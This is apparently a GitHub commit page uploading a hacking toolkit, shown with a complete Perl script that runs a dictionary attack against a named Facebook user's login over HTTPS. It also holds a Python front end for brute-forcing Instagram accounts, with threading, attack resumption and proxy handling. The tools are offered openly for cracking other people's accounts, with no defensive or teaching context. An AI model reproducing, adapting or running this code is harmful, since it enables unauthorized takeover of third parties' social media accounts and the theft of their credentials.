Add files via upload

unkn0wnh4ckr · Jan 20, 2019 · e4eadf3 · e4eadf3
commit e4eadf3
Show file tree

Hide file tree

Showing 26 changed files with 1,455 additions and 0 deletions.
diff --git a/htk.py b/htk.py
diff --git a/tools/fb-brute.pl b/tools/fb-brute.pl
@@ -0,0 +1,124 @@
+#!/usr/bin/perl
+#
+# Bruteforce-Facebook
+#
+# Description:
+# Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS.
+#
+# Usage:
+# perl Imad'Ox-Bruter.pl login wordlist
+# login could be either a user's email address or profile name
+#
+# Module Requirements:
+#
+# Install module if missing:
+# perl -MCPAN -e 'install Net::SSLeay'
+#
+# Demo:
+# perl Imad'Ox-Bruter.pl [email protected] wordlist.lst
+#
+# --- Imad'Ox-Bruter Facebook password cracking tool
+# --- By Imad'Ox Hunter
+# --- www.facebook.com/imad.elouajib
+#
+# [+] Cracking [email protected] ...
+#
+# [-] test -> Failed
+# [-] test123 -> Failed
+# [-] testtest -> Failed
+# [-] testest123 -> Failed
+# [-] qwerty -> Failed
+# [-] azerty -> Failed
+# [-] password -> Failed
+# [-] password123 -> Failed
+#
+########################################################
+# [+] CRACKED! Your password is P@$$W0RD
+########################################################
+#
+
+use strict;
+use Net::SSLeay::Handle;
+
+if(!defined($ARGV[0] && $ARGV[1])) {
+
+system('clear');
+print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
+print "+++ Coded by Imad'Ox-Hunter\n";
+print "+++ www.fb.com/imad.elouajib\n\n";
+print "+++ Usage: perl $0 login wordlist\n\n";
+exit; }
+
+my $user = $ARGV[0];
+my $wordlist = $ARGV[1];
+
+open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n";
+
+print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
+print "+++ Coded by Imad'Ox-Hunter\n";
+print "+++ www.fb.com/imad.elouajib\n";
+print "\n[+] Now Cracking $user ...\n\n";
+
+while (my $password = <LIST>) {
+chomp ($password);
+$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
+
+my $a = "POST /login.php HTTP/1.1";
+my $b = "Host: www.facebook.com";
+my $c = "Connection: close";
+my $e = "Cache-Control: max-age=0";
+my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
+my $g = "Origin: https://www.facebook.com";
+my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
+my $i = "Content-Type: application/x-www-form-urlencoded";
+my $j = "Accept-Encoding: gzip,deflate,sdch";
+my $k = "Accept-Language: en-US,en;q=0.8";
+my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";
+
+my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
+my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
+my $cl = length($post);
+my $d = "Content-Length: $cl";
+
+
+my ($host, $port) = ("www.facebook.com", 443);
+
+tie(*SSL, "Net::SSLeay::Handle", $host, $port);
+
+
+print SSL "$a\n";
+print SSL "$b\n";
+print SSL "$c\n";
+print SSL "$d\n";
+print SSL "$e\n";
+print SSL "$f\n";
+print SSL "$g\n";
+print SSL "$h\n";
+print SSL "$i\n";
+print SSL "$j\n";
+print SSL "$k\n";
+print SSL "$l\n";
+print SSL "$cookie\n\n";
+
+print SSL "$post\n";
+
+my $success;
+while(my $result = <SSL>){
+if($result =~ /Location(.*?)/){
+$success = $1;
+}
+}
+if (!defined $success)
+{
+print "[-] $password -> Not Him :( \n";
+close SSL;
+}
+else
+{
+print "\n########################################################\n";
+print "[+] Yuuup!! Pass Cracked => Pass is $password :D\n";
+print "########################################################\n\n";
+close SSL;
+exit;
+}
+}
diff --git a/tools/instagram.py b/tools/instagram.py
@@ -0,0 +1,61 @@
+# Date: 05/05/2018
+# Author: Pure-L0G1C
+# Description: Bruteforce Instagram
+
+from time import sleep 
+from os.path import exists
+from sys import exit, version 
+from lib.bruter import Bruter 
+from lib.session import Session 
+from argparse import ArgumentParser
+
+def _input(msg):
+ return raw_input(msg).lower() if int(version.split()[0].split('.')[0]) == 2 else input(msg).lower()
+
+def main():
+
+ # assign arugments
+ args = ArgumentParser()
+ args.add_argument('username', help='email or username')
+ args.add_argument('wordlist', help='password list')
+ args.add_argument('threads', help='password per seconds. Any number <= 16')
+ args = args.parse_args()
+
+ if not exists(args.wordlist):
+  exit('[!] Unable to locate `{}`'.format(args.wordlist))
+
+ if not args.threads.isdigit():
+  exit('[!] Threads must be a number')
+
+ # assign variables
+ engine = Bruter(args.username.title(), int(args.threads), args.wordlist)
+ session = Session(args.username.title(), args.wordlist)
+
+ if session.exists():
+  if _input('Do you want to resume the attack? [y/n]: ').split()[0][0] == 'y':
+   data = session.read()
+   if data:
+    engine.attempts = int(data['attempts'])
+    engine.passlist.queue = eval(data['queue'])
+    engine.retrieve = True
+
+ # start attack
+ try:
+  engine.start()
+ except KeyboardInterrupt:
+  engine.user_abort = True 
+ finally:
+  if all([engine.spyder.proxy_info, not engine.isFound]):
+   engine.display(engine.pwd)
+
+  if all([not engine.read, engine.user_abort, not engine.isFound]):
+   print('{}[!] Exiting ...'.format('' if not engine.spyder.proxy_info else '\n'))
+
+  if all([engine.read, not engine.isFound]):
+   print('\n[*] Password not found')
+
+  sleep(1.5)
+  engine.stop()
+
+if __name__ == '__main__':
+ main()
diff --git a/tools/lib/__init__.py b/tools/lib/__init__.py
@@ -0,0 +1 @@
+
diff --git a/tools/lib/__init__.pyc b/tools/lib/__init__.pyc